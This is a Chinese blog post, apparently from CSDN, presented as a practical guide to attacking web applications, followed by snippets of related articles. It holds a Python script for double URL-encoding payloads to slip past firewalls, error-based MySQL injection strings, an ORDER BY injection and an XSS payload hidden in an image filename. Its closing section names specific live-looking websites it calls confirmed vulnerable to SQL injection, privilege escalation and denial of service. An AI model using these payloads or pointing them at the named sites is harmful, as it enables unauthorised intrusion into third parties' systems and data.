Web应用攻击的方法及实践经验

原创 已于 2024-06-12 14:51:50 修改 · 374 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #xss

于 2023-08-15 09:43:19 首次发布
本文介绍了如何利用SQL数据注入(包括检索框、ORDERBY和图片上传)以及XSS攻击的方法。作者提供了漏洞网站示例和常用的扫描工具,同时展示了如何编写Python代码绕过防御机制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

此文章会持续更新,我会发一些已经存在漏洞的网站实例在上边,以便于大家更好直观如何进行Web攻击

本文章的所提到的网站漏洞只是本人猜想,并没有证实,如果发现有雷同的网站漏洞和纯属巧合。

文章目录

发布网站安全类的网站

第一步:关注漏洞网站
【国家信息安全漏洞共享平台】
https://www.cnvd.org.cn/
【CVE】
https://cve.mitre.org/
【漏洞盒子】斗象科技
https://planet.vulbox.com/detail/MTIxODE=
【山西鑫鼎宸科技股份有限公司】
http://www.sxxdckj.com/cms/c/qita.html?page=2
【360补天平台】
https://www.butian.net/Reward/plan/1

第二步:熟悉扫描工具
例如:
HCL AppScan Standard 【常见的扫描工具】
sqlmap_GUI【进阶版SQl注入工具】
python代码编写【手搓核弹,手动编写代码攻击】

第三步:了解各种防御手段,例如拦截XSS攻击和SQl注入,一般的代码是屏蔽特殊字段和url转译

利用python编写一段代码绕开防火墙和代码拦截

	import string
payload=";p";
retVal = payload
if payload:
    retVal = ""
    i = 0
 
    while i < len(payload):
        if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
            retVal += '%%25%s' % payload[i + 1:i + 3]
            i += 3
        else:
            retVal += '%%25%.2X' % ord(payload[i])
            i += 1
 
print (retVal)

上传这一段是写了一个url2次编码,可以绕过防火墙XSS/SQL等特殊字节
被直接屏蔽掉

SQL数据注入

1.通过检索框注入

mysql 数据库在搜索框中输入:

 1' and extractvalue(

会有暴库的效果,但由于防火墙和代码不让你输入特殊字符和关键词,这时候就可以进行url转码变成

1%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528

这样会绕开防火墙的检测。

2.通过ORDER BY 注入

select * from users order by 字段 ASC ;

字段变成 一下语句利用mysql 函数,进行暴库

extractvalue(1,(select concat(0x7e,user())))

3.通过上传图片xss攻击

将一张图片名改为,即可实现xss攻击 
&lt;img src=x οnerrοr='prompt(1)'&gt;aaaa.jpg

4.常见高危端口

常见的高危端口主要有以下五类,表1-1提供了常见高危端口的不完全列表,供参考。

  1. ●远程管理服务:远程运维是企业IT运维人员的日常工作,而多数远程管理服务都是攻击者的首选目标,直接开放风险巨大。建议部署运维审计系统(如华为UMA1000),并通过VPN接入内网后登录。如未部署运维审计系统,请务必选择安全的加密应用,如SSHv2。
  2. ●局域网服务:这些服务端口安全漏洞多,常被攻击者利用,造成严重的安全事件。此类服务主要应用于企业内网访问,完全可以在出口防火墙上封禁。一般情况下,企业自建DNS服务器仅限于解析自有域名,不会对外开放,因此可以在互联网出口防火墙上封禁DNS服务。
  3. ●互联网服务:SMTP、POP3、IMAP等邮件协议在设计之初没有内置安全性,请使用SSL/TLS加密保护。同样,如果需要对外提供Web服务,请使用HTTPS协议替代HTTP。
  4. ●数据库:所有的数据库端口都不应该对外开放。
  5. ●木马常用端口:攻击者在主机中植入木马以后,会在失陷主机中开放后门端口。常用的后门端口很多,如123、1234、12345、666、4444、3127、31337、27374等。在病毒爆发时期,请封禁此类端口。

已经发现漏洞的网站

已经证实有网站安全问题,如有疑问可以在底下留言评论查看详细漏洞

sql回显

  1. http://www.sanfengruike.com
  2. http://whdkkj.com
  3. https://www.0735.org.cn
  4. http://www.km.cn

用户越权

  1. http://www.gzyxlib.cn/

SQL注入

  1. http://www.hailuozy.com/index.html
  2. http://qiantucc.com/index.html
  3. http://ys.zeiot.cn/xmxz2.aspx

DOS攻击

http://cmp.tcl.com:82/Frame/Login.htm

微小的xx
关注
Web应用攻击实验-理解文件上传攻击的基本原理
qq_20381661的专栏
04-10 2909
实验环境: 攻击机,Win10物理机(192.168.17.129) 靶机,OWASP Broken Web Apps(192.168.17.130)桥接模式 由于实验分时段完成,每次的网段不一样,但攻击机和靶机的地址始终为129和130。 工具,中国蚁剑 1.在Win10浏览器中输入192.168.17.130访问OWASP,点击“Train”,在username中输入 :admin‘or’1=1,登录成功后,选择“Damn Vulnerable Web Application”训练环境。
web安全(xss/csrf)简单攻击原理和防御方案(实战篇)
m0_71744044的博客
01-29 262
最近在学习node,就顺便写了web安全攻击的示例以及解决方案。
Web安全中的XSS攻击详细教学(一),Xss-Labs靶场通关全教程(建议收藏)
xt350488的博客
06-17 1869
xss(cross site script)跨站脚本攻击,指的是攻击者往web页面插入,当用户浏览时,嵌入web页面里的脚本代码就会执行,从而达到恶意攻击用户的特殊目的,它主要分为俩种类型。
【图解HTTP】|【09】Web攻击技术
weixin_45926547的博客
05-29 3586
文章目录1、针对Web攻击技术1.1 客户端即可篡改请求1.2 针对Web应用攻击模式2、因输出值转义不完全引发的安全漏洞2.1 跨站脚本攻击2.2 SQL注入攻击 1、针对Web攻击技术 1.1 客户端即可篡改请求 HTTP请求报文内加载URL查询字段或表单、HTTP首部、Cookie等将攻击传入; 若Web应用存在安全漏洞,那么内部信息就会遭到窃取,或被攻击者拿到管理权限; 1.2 针对Web应用攻击模式 对Web应用攻击模式: - 主动攻击; - 被动攻击; 【主动攻击】:指攻击者通
【网络安全知识体系】外网渗透测试 | 14个小实验
热门推荐
04-18 1万+
【通俗易懂】外网渗透测试的流程&14个小实验带你了解网络安全
SQL注入攻击Web应用安全防范技术研究与实践.pdf
09-19
SQL注入攻击是一种常见的网络安全威胁,它发生在Web应用的数据库交互环节。攻击者通过向数据库提交恶意构造的...通过对上述内容的学习和实践,可以有效提高Web应用的抗攻击能力,并减少由SQL注入导致的安全事件的发生。
网络安全XSS漏洞(跨站脚本攻击)原理、攻击方式及防御措施:Web应用安全防护指南
最新发布
04-10
内容概要:本文详细介绍了XSS(跨站脚本攻击)...其他说明:本文不仅帮助读者深入了解XSS攻击的具体实现方式,还提供了实际的防御建议,有助于提高Web应用程序的安全性。建议读者在实践中结合具体案例进行分析和测试。
web应用程序开发课程设计实践课程教学大纲(质量标准)共
11-01
6. **安全与性能**:讲解Web应用的安全最佳实践,如防止SQL注入、XSS攻击,以及优化加载速度、资源管理等。 7. **项目管理与版本控制**:引入Git进行版本控制,讲解敏捷开发方法,如Scrum或Kanban,以实现高效协作...
(完整word)Web-应用的安全探测技术原理及最佳实践.doc
11-15
Web应用程序进行安全检测,识别...安全探测人员需要熟悉各种工具和方法,及时发现并修复安全漏洞,以保护Web应用免受黑客攻击。同时,文档也强调了安全运营的标准流程和角色职责,以确保整个安全管理体系的有效运作。
课程11-Web应用攻击及防御技术(下)1
08-03
【课程11-Web应用攻击及防御技术(下)1】主要涵盖了Web应用程序的安全问题,包括其体系结构中的安全威胁、攻防技术概述、具体的SQL注入漏洞测试、XSS跨站脚本攻击以及相关的课外实践作业。以下是这些知识点的详细...
Web应用安全:使用SQL注入攻击篡改数据实验.doc
06-20
实验二:使用SQL注入攻击篡改数据 一、实验目的 实践SQL注入攻击 进入网站后台 二、实验内容 首先找到注入点,判断注入类型与注入方式,然后再进行暴库、表、表字段操作,最后再获取账号与密码数据,而后返回登录页面进入后台。 实验环境 1、靶机 2、VMware虚拟机 四、实验步骤 手工注入 打开靶机,访问正常的页面 在id=35后输入单引号,结果页面报错 在id=35后输入and 1=1,页面正常 在id=35后输入and 1=2,页面报错 PS:证明这是一个存在注入漏洞的页面,且注入点为数字型注入 用order by 语句查询有多少列字段,16报错 15显示正常页面 PS:说明网页注入字段长为15 用不存在的参数显示出回显位置为3,7,8,9,11,12,14 PS:判断出网页回显信息的位置,以便获取注入语句执行后返回的信息 查询当前页面所在数据库信息 系统用户名:root@localhost 操作系统:Win32 数据库名:cms 用户名:root@localhost 数据库版本:5.5.53 //5.0及以上和5.0以下手工注入方式不一样 在这里我们选择cms这个数据库,将cms
Web爆破攻击实战】Web前端黑客技术解密
A_991128a的博客
03-08 89
在很多情况下,黑客在找不到其他途径进入 Web 管理后台时,就会采用暴力破解的方式来破解后台管理员的账号和密码。所谓暴力破解,就是使用“穷举法”,对用户名和密码进行逐个猜解,直至猜出来为止。虽然暴力破解显得不是很有技术含量,但确实最有效的一种方式。理论上来说,只要时间足够,终究会把用户名和密码猜解出来。为了提高暴力破解的效率,一般在破解时,都会使用字典。所谓字典,就是黑客会把自己认为的有可能是正确的密码,以及曾经碰到过的密码,写到一个文档里去,这个文档就是字典。
网络安全实验——web安全
weixin_58628068的博客
05-18 5223
XSS(Cross-Site Scripting)是一种常见的Web应用程序漏洞,攻击者可以通过注入恶意脚本来获取用户的敏感信息或者控制用户的账户。攻击者可以通过在输入框、URL参数等地方注入恶意脚本来实现XSS攻击。为了防止XSS攻击,应该对用户提交的数据进行过滤和转义,避免将用户输入的内容作为HTML或JavaScript代码直接输出到页面上。在盗取rookie(一个虚拟人物)的实验中,攻击者通过在评论中注入恶意脚本,来实现对rookie账户的控制。
WEB安全攻防入门教程(非常详细),从零基础入门到精通,看完这一篇就够了
Python_0011的博客
01-11 2015
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。最后的最后,祝每一位看到这里的朋友都能被世界善待,收获自己想要的offer。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。推荐指数:★★★★★。推荐指数:★★★★★。推荐指数:★★★★★。推荐指数:★★★★★。
《网络对抗》—— Web安全基础实践
2401_88326365的博客
12-25 1162
这次实验使用webgoat来分别尝试了XSS攻击、CSRF攻击SQL注入攻击,感触还是很深。之所以能够进行这些攻击,不止是因为我们的web设计本身就有漏洞!还有我们在使用web的时候,太大意太疏忽了,没有想到会有一些危险的情况发生。
常见的 Web 应用攻击
nashviller的专栏
08-21 789
转自:http://www.51testing.com/?uid-7622-action-viewspace-itemid-848701 仅仅转载了其中的一部分,详细的内容请参考原文即可 在 OWASP 组织列举的十大 Web 应用安全隐患中,有两个概率最高的攻击手段,它们分别是“跨站点脚本攻击”(Cross-Site Scripting)和“注入缺陷”(Injection Flaws
常见Web攻击和防御
bluemoon_0的博客
01-17 314
常见Web攻击和防御
网络安全实验教程【2.3】
qq_43416206的博客
04-07 812
其中, $name 是用户输入的字符串,如果输入的字符串是'or'1'='1'#,则该 SQL 语句变成了无条件查询语句,因此会得到所有的学号/工号,其输入界面和攻击效果如图 6.9所示,由此得到了表 6-1 中所示的所有用户的学号/工号。学生成绩管理系统中的根据姓名获取学号/工号的功能, 需要根据用户输入的姓名(汉语拼音),然后到 MySQL 数据库中查询相关的表格得到结果,根据 SQL 注入基本原理,这里可能存在 SQL 注入点。输入正常姓名(汉语拼音),则得到正常输出信息,如图 6.3 所示。
网测科技_Web攻击靶场测试案例
Netitest的博客
11-13 519
Web攻击靶场测试案例
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值